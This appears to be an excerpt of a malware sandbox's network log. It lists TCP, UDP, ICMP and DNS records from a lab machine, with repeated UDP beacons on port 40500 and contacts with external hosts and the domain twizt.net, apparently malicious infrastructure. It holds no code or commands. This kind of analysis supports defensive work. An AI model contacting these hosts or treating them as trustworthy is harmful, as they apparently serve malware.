                                                                              May 8, 2024 15:25:39.678244114 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678260088 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678298950 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678329945 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678368092 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678381920 CEST8049792185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.678423882 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678901911 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.678937912 CEST4979280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.822312117 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.822788954 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.822804928 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.822870016 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.822957039 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.822978020 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823024988 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823054075 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823371887 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823386908 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823412895 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823434114 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823673964 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823708057 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823712111 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823726892 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823751926 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823775053 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823790073 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823805094 CEST8049793185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:39.823823929 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:39.823844910 CEST4979380192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:41.327995062 CEST804977791.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:41.328058004 CEST4977780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:42.716382027 CEST4977780192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:42.716691971 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:42.857667923 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.061362982 CEST804977791.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.063154936 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.063225031 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.063368082 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.202824116 CEST804979591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.202918053 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.203051090 CEST4979580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.411587954 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.412086964 CEST804979491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.412163019 CEST4979480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:25:43.547919989 CEST804979591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:25:43.548258066 CEST804979591.202.233.141192.168.2.8
May 8, 2024 15:25:43.548360109 CEST | 49795 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:45.434943914 CEST | 49794 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:45.576303005 CEST | 49795 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:45.576699972 CEST | 49796 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:45.781805038 CEST | 80 | 49794 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:45.781867027 CEST | 49794 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:45.921127081 CEST | 80 | 49795 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:45.921211958 CEST | 49795 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:45.926316023 CEST | 80 | 49796 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:45.926405907 CEST | 49796 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:45.926543951 CEST | 49796 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:46.276807070 CEST | 80 | 49796 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:46.277040005 CEST | 80 | 49796 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:46.277164936 CEST | 49796 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:47.810445070 CEST | 49794 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:48.156766891 CEST | 80 | 49794 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:48.156882048 CEST | 49794 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:48.311369896 CEST | 49796 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:48.311671019 CEST | 49797 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:48.660558939 CEST | 80 | 49796 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:48.660645962 CEST | 49796 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:48.666532993 CEST | 80 | 49797 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:48.666672945 CEST | 49797 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:48.666867971 CEST | 49797 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:48.900365114 CEST | 49798 | 40500 | 192.168.2.8 | 88.204.241.110
May 8, 2024 15:25:49.024485111 CEST | 80 | 49797 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:49.024565935 CEST | 80 | 49797 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:49.024642944 CEST | 49797 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:49.902575016 CEST | 49798 | 40500 | 192.168.2.8 | 88.204.241.110
May 8, 2024 15:25:51.217668056 CEST | 49799 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:51.217803001 CEST | 49797 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:51.218004942 CEST | 49800 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:51.563277006 CEST | 80 | 49800 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:51.563431025 CEST | 49800 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:51.563631058 CEST | 49800 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:51.570775032 CEST | 80 | 49799 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:25:51.572272062 CEST | 80 | 49797 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:51.572395086 CEST | 49797 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:51.909006119 CEST | 80 | 49800 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:51.909209013 CEST | 80 | 49800 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:51.909300089 CEST | 49800 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:52.012219906 CEST | 49798 | 40500 | 192.168.2.8 | 88.204.241.110
May 8, 2024 15:25:52.076541901 CEST | 49799 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:52.429670095 CEST | 80 | 49799 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:25:52.933765888 CEST | 49799 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:53.288975000 CEST | 80 | 49799 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:25:53.793339014 CEST | 49799 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:53.935472012 CEST | 49800 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:53.935822964 CEST | 49801 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:54.148015022 CEST | 80 | 49799 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:25:54.280884027 CEST | 80 | 49800 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:54.282645941 CEST | 49800 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:54.287169933 CEST | 80 | 49801 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:54.290606022 CEST | 49801 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:54.290774107 CEST | 49801 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:54.642321110 CEST | 80 | 49801 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:54.642417908 CEST | 80 | 49801 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:54.642558098 CEST | 49801 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:54.652534962 CEST | 49799 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:55.005399942 CEST | 80 | 49799 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:25:56.027555943 CEST | 49798 | 40500 | 192.168.2.8 | 88.204.241.110
May 8, 2024 15:25:56.669929028 CEST | 49801 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:56.670205116 CEST | 49802 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:57.026108027 CEST | 80 | 49801 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:57.026196003 CEST | 49801 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:57.027179003 CEST | 80 | 49802 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:57.027302027 CEST | 49802 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:57.027489901 CEST | 49802 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:57.029340982 CEST | 49803 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:57.380206108 CEST | 80 | 49802 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:57.380295992 CEST | 80 | 49802 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:25:57.380425930 CEST | 49802 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:25:57.382529974 CEST | 80 | 49803 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:25:57.918157101 CEST | 49803 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:58.271414995 CEST | 80 | 49803 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:25:58.777549028 CEST | 49803 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:59.130918980 CEST | 80 | 49803 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:25:59.636882067 CEST | 49803 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:25:59.990106106 CEST | 80 | 49803 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:00.420448065 CEST | 49804 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:00.496408939 CEST | 49803 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:00.772665977 CEST | 80 | 49804 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:00.849531889 CEST | 80 | 49803 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:01.277579069 CEST | 49804 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:01.626549959 CEST | 80 | 49804 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:02.136946917 CEST | 49804 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:02.487306118 CEST | 80 | 49804 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:02.873296976 CEST | 49805 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:02.996331930 CEST | 49804 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:03.223018885 CEST | 80 | 49805 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:03.347361088 CEST | 80 | 49804 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:03.730665922 CEST | 49805 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:03.855777025 CEST | 49804 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:04.043292046 CEST | 49798 | 40500 | 192.168.2.8 | 88.204.241.110
May 8, 2024 15:26:04.080791950 CEST | 80 | 49805 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:04.205101013 CEST | 80 | 49804 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:04.590050936 CEST | 49805 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:04.939845085 CEST | 80 | 49805 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:05.449387074 CEST | 49805 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:05.799149990 CEST | 80 | 49805 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:06.233151913 CEST | 49806 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:06.308906078 CEST | 49805 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:06.583261013 CEST | 80 | 49806 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:06.658628941 CEST | 80 | 49805 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:07.090117931 CEST | 49806 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:07.441028118 CEST | 80 | 49806 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:07.949453115 CEST | 49806 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:08.299576044 CEST | 80 | 49806 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:08.808756113 CEST | 49806 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:09.163947105 CEST | 80 | 49806 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:09.668188095 CEST | 49806 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:09.811280966 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.018567085 CEST | 80 | 49806 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:10.154156923 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.156699896 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.156857967 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.496879101 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.497107029 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.497241974 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.497313976 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.497333050 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.497349024 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.497396946 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.497562885 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.497608900 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.497654915 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.498065948 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.498089075 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.498331070 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.498344898 CEST | 80 | 49807 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:10.498383045 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:10.498402119 CEST | 49807 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:12.047370911 CEST | 49808 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:12.401315928 CEST | 80 | 49808 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:12.530006886 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:12.867367029 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:12.870595932 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:12.870759010 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:12.902508974 CEST | 49808 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:13.211340904 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.211987972 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.212258101 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.212305069 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.212373972 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.212457895 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:13.212457895 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:13.212457895 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:13.212554932 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.212584019 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.212657928 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.212678909 CEST | 80 | 49809 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:13.212703943 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:13.212729931 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:13.256287098 CEST | 80 | 49808 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:13.385663033 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:13.385704994 CEST | 49809 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:13.761918068 CEST | 49808 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:14.115581036 CEST | 80 | 49808 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:14.652628899 CEST | 49808 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:15.008029938 CEST | 80 | 49808 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:15.043973923 CEST | 49810 | 40500 | 192.168.2.8 | 187.250.131.80
May 8, 2024 15:26:15.404361010 CEST | 49811 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:15.652755976 CEST | 49808 | 80 | 192.168.2.8 | 193.233.132.177
May 8, 2024 15:26:15.744654894 CEST | 80 | 49811 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:26:15.744741917 CEST | 49811 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:26:16.006516933 CEST | 80 | 49808 | 193.233.132.177 | 192.168.2.8
May 8, 2024 15:26:16.184322119 CEST | 49810 | 40500 | 192.168.2.8 | 187.250.131.80
May 8, 2024 15:26:18.157546043 CEST | 80 | 49794 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:26:18.157613993 CEST | 49794 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:26:18.199372053 CEST | 49810 | 40500 | 192.168.2.8 | 187.250.131.80
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 8, 2024 15:22:19.966809034 CEST | 53100 | 40500 | 192.168.2.8 | 10.102.10.21
May 8, 2024 15:22:25.401623011 CEST | 53100 | 40500 | 192.168.2.8 | 10.102.10.21
May 8, 2024 15:22:30.416734934 CEST | 53100 | 40500 | 192.168.2.8 | 189.222.182.86
May 8, 2024 15:22:35.420978069 CEST | 53100 | 40500 | 192.168.2.8 | 2.133.220.58
May 8, 2024 15:22:40.436269999 CEST | 53100 | 40500 | 192.168.2.8 | 100.82.121.252
May 8, 2024 15:22:45.451795101 CEST | 53100 | 40500 | 192.168.2.8 | 92.124.152.236
May 8, 2024 15:22:50.451420069 CEST | 53100 | 40500 | 192.168.2.8 | 93.123.145.179
May 8, 2024 15:22:55.451896906 CEST | 53100 | 40500 | 192.168.2.8 | 89.236.218.241
May 8, 2024 15:22:59.261123896 CEST | 58590 | 53 | 192.168.2.8 | 1.1.1.1
May 8, 2024 15:22:59.424319029 CEST | 53 | 58590 | 1.1.1.1 | 192.168.2.8
May 8, 2024 15:22:59.431577921 CEST | 51234 | 53 | 192.168.2.8 | 1.1.1.1
May 8, 2024 15:22:59.595222950 CEST | 53 | 51234 | 1.1.1.1 | 192.168.2.8
May 8, 2024 15:23:00.526493073 CEST | 53100 | 40500 | 192.168.2.8 | 89.218.238.106
May 8, 2024 15:23:05.526587963 CEST | 53100 | 40500 | 192.168.2.8 | 85.204.86.26
May 8, 2024 15:23:07.693244934 CEST | 61330 | 53 | 192.168.2.8 | 1.1.1.1
May 8, 2024 15:23:07.862080097 CEST | 53 | 61330 | 1.1.1.1 | 192.168.2.8
May 8, 2024 15:23:10.514270067 CEST | 53100 | 40500 | 192.168.2.8 | 89.236.219.106
May 8, 2024 15:23:15.532761097 CEST | 53100 | 40500 | 192.168.2.8 | 37.120.247.6
May 8, 2024 15:23:20.531721115 CEST | 53100 | 40500 | 192.168.2.8 | 92.47.124.54
May 8, 2024 15:23:25.545392036 CEST | 53100 | 40500 | 192.168.2.8 | 102.130.192.212
May 8, 2024 15:23:30.560770035 CEST | 53100 | 40500 | 192.168.2.8 | 91.92.206.184
May 8, 2024 15:23:35.561279058 CEST | 53100 | 40500 | 192.168.2.8 | 109.168.235.213
May 8, 2024 15:23:40.576210022 CEST | 53100 | 40500 | 192.168.2.8 | 187.235.148.47
May 8, 2024 15:23:45.576159000 CEST | 53100 | 40500 | 192.168.2.8 | 187.133.57.73
May 8, 2024 15:23:50.576286077 CEST | 53100 | 40500 | 192.168.2.8 | 77.240.41.3
May 8, 2024 15:23:55.592483044 CEST | 53100 | 40500 | 192.168.2.8 | 88.135.33.186
May 8, 2024 15:24:00.592612028 CEST | 53100 | 40500 | 192.168.2.8 | 94.141.69.176
May 8, 2024 15:24:05.596669912 CEST | 53100 | 40500 | 192.168.2.8 | 189.186.73.73
May 8, 2024 15:24:10.610780954 CEST | 53100 | 40500 | 192.168.2.8 | 89.219.223.67
May 8, 2024 15:24:15.607469082 CEST | 53100 | 40500 | 192.168.2.8 | 87.237.239.65
May 8, 2024 15:24:20.623168945 CEST | 53100 | 40500 | 192.168.2.8 | 2.191.74.251
May 8, 2024 15:24:25.761945009 CEST | 53100 | 40500 | 192.168.2.8 | 92.47.251.85
May 8, 2024 15:24:30.766488075 CEST | 53100 | 40500 | 192.168.2.8 | 89.218.238.106
May 8, 2024 15:24:35.822434902 CEST | 53100 | 40500 | 192.168.2.8 | 82.200.224.194
May 8, 2024 15:24:40.827235937 CEST | 53100 | 40500 | 192.168.2.8 | 95.156.103.50
May 8, 2024 15:24:45.826837063 CEST | 53100 | 40500 | 192.168.2.8 | 80.80.214.50
May 8, 2024 15:24:50.841681957 CEST | 53100 | 40500 | 192.168.2.8 | 82.194.10.40
May 8, 2024 15:24:55.842050076 CEST | 53100 | 40500 | 192.168.2.8 | 2.180.211.255
May 8, 2024 15:25:00.845896959 CEST | 53100 | 40500 | 192.168.2.8 | 186.94.185.219
May 8, 2024 15:25:05.857201099 CEST | 53100 | 40500 | 192.168.2.8 | 5.255.18.13
May 8, 2024 15:25:10.873131990 CEST | 53100 | 40500 | 192.168.2.8 | 2.190.51.122
May 8, 2024 15:25:16.364409924 CEST | 53100 | 40500 | 192.168.2.8 | 217.164.211.207
May 8, 2024 15:25:21.361872911 CEST | 53100 | 40500 | 192.168.2.8 | 41.199.184.238
May 8, 2024 15:25:26.373049021 CEST | 53100 | 40500 | 192.168.2.8 | 5.235.233.254
May 8, 2024 15:25:31.375852108 CEST | 53100 | 40500 | 192.168.2.8 | 5.219.253.209
May 8, 2024 15:25:36.373022079 CEST | 53100 | 40500 | 192.168.2.8 | 89.106.236.58
May 8, 2024 15:25:41.388560057 CEST | 53100 | 40500 | 192.168.2.8 | 100.111.103.217
May 8, 2024 15:25:46.388922930 CEST | 53100 | 40500 | 192.168.2.8 | 89.249.62.87
May 8, 2024 15:25:51.404406071 CEST | 53100 | 40500 | 192.168.2.8 | 109.168.235.213
May 8, 2024 15:25:56.422772884 CEST | 53100 | 40500 | 192.168.2.8 | 2.185.146.181
May 8, 2024 15:26:01.437855005 CEST | 53100 | 40500 | 192.168.2.8 | 146.70.53.161
May 8, 2024 15:26:06.451778889 CEST | 53100 | 40500 | 192.168.2.8 | 84.53.244.106
May 8, 2024 15:26:11.466891050 CEST | 53100 | 40500 | 192.168.2.8 | 190.36.195.147
Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 8, 2024 15:23:12.553208113 CEST | 212.154.184.158 | 192.168.2.8 | 4d0f | (Host unreachable) | Destination Unreachable
May 8, 2024 15:23:15.862824917 CEST | 212.154.184.158 | 192.168.2.8 | 4d0f | (Host unreachable) | Destination Unreachable
May 8, 2024 15:23:15.862845898 CEST | 212.154.184.158 | 192.168.2.8 | 4d0f | (Host unreachable) | Destination Unreachable
May 8, 2024 15:23:22.132114887 CEST | 212.154.184.158 | 192.168.2.8 | 4d0f | (Host unreachable) | Destination Unreachable
May 8, 2024 15:23:28.804625034 CEST | 212.154.184.158 | 192.168.2.8 | 4d0f | (Host unreachable) | Destination Unreachable
May 8, 2024 15:23:35.924915075 CEST | 109.168.235.213 | 192.168.2.8 | 1969 | (Port unreachable) | Destination Unreachable
May 8, 2024 15:25:51.768331051 CEST | 109.168.235.213 | 192.168.2.8 | 1969 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 8, 2024 15:22:59.261123896 CEST | 192.168.2.8 | 1.1.1.1 | 0x1416 | Standard query (0) | yahoo.com | MX (Mail exchange) | IN (0x0001) | false
May 8, 2024 15:22:59.431577921 CEST | 192.168.2.8 | 1.1.1.1 | 0xc317 | Standard query (0) | mta7.am0.yahoodns.net | A (IP address) | IN (0x0001) | false
May 8, 2024 15:23:07.693244934 CEST | 192.168.2.8 | 1.1.1.1 | 0x5b49 | Standard query (0) | twizt.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 8, 2024 15:22:59.424319029 CEST | 1.1.1.1 | 192.168.2.8 | 0x1416 | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
May 8, 2024 15:22:59.424319029 CEST | 1.1.1.1 | 192.168.2.8 | 0x1416 | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
May 8, 2024 15:22:59.424319029 CEST | 1.1.1.1 | 192.168.2.8 | 0x1416 | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
May 8, 2024 15:22:59.595222950 CEST | 1.1.1.1 | 192.168.2.8 | 0xc317 | No error (0) | mta7.am0.yahoodns.net | | 67.195.228.94 | A (IP address) | IN (0x0001) | false
May 8, 2024 15:22:59.595222950 CEST | 1.1.1.1 | 192.168.2.8 | 0xc317 | No error (0) | mta7.am0.yahoodns.net | | 98.136.96.76 | A (IP address) | IN (0x0001) | false
May 8, 2024 15:22:59.595222950 CEST | 1.1.1.1 | 192.168.2.8 | 0xc317 | No error (0) | mta7.am0.yahoodns.net | | 98.136.96.74 | A (IP address) | IN (0x0001) | false
May 8, 2024 15:22:59.595222950 CEST | 1.1.1.1 | 192.168.2.8 | 0xc317 | No error (0) | mta7.am0.yahoodns.net | | 67.195.228.109 | A (IP address) | IN (0x0001) | false
May 8, 2024 15:22:59.595222950 CEST | 1.1.1.1 | 192.168.2.8 | 0xc317 | No error (0) | mta7.am0.yahoodns.net | | 67.195.204.74 | A (IP address) | IN (0x0001) | false
